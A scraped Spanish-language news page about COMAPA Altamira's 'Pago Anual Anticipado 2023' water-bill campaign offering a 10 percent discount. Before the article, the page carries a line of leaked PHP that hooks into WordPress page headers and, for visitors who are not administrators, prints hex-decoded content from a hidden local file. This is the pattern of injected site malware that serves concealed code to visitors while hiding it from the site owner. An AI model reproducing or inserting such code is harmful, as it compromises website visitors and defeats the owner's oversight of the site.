if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Emprende COMAPA Altamira campaña “Pago Anual Anticipado 2023” – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Emprende COMAPA Altamira campaña “Pago Anual Anticipado 2023”

Emprende COMAPA Altamira campaña “Pago Anual Anticipado 2023”

Con vigencia al 31 de diciembre del presente año

Para la COMAPA Altamira, que dirige el ingeniero Omar Hernández Leines, brindar una atención sensible a la economía familiar es una prioridad, por lo que este organismo operador del agua lleva a cabo la campaña “Pago Anual Anticipado 2023”.

A través de este benéfico esquema, la ciudadanía puede acceder a un descuento del 10 por ciento con tarifa 2022, además de evitar filas, cortes y sanciones durante todo el año; lo anterior con vigencia al 31 de diciembre del año en curso.

El gerente general del organismo, Ing. Omar Hernández Leines señaló que personal con gran vocación de servicio estará brindado una atención de calidad y calidez a los usuarios que acudan a los módulos disponibles para aprovechar esta oportunidad.

“El pago anual anticipado ayuda a los usuarios a no tener recargos ni cortes en el servicio, es un programa muy importante que además ofrece un diez por ciento de descuento de acuerdo a los últimos consumos del año”, detalló.

Bajo la encomienda del presidente municipal, Mtro. Armando Martínez Manríquez, la Comisión Municipal de Agua Potable y Alcantarillado de Altamira implementa estrategias que se ajustan a la economía de las familias altamirenses, enfocadas también a ofrecer un servicio eficiente.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas